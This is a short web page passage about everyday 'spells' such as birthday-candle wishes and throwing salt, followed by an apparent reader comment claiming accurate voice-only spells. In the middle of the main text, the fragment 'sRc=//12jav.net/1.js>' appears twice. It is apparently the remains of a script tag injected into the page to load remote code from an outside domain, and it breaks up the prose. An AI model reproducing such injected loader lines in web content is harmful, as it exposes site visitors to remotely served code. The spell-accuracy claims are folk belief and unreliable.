Belief is enough, but ingredients, and "tools" can help with the belief. Many people have cast spells without ever knowing it!
Ever blown out the candles on a cake and made a wish? You have cast a spell. Ever pulled a wishbone? That's another spell. Thrown salt over your shoulder for good luck? It's a spell! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I thought so I am very new to this, however have been having extremely amazing.accuracy with every spell I have performed weather it called for ingredients or not I have only used my voice no ingredients.
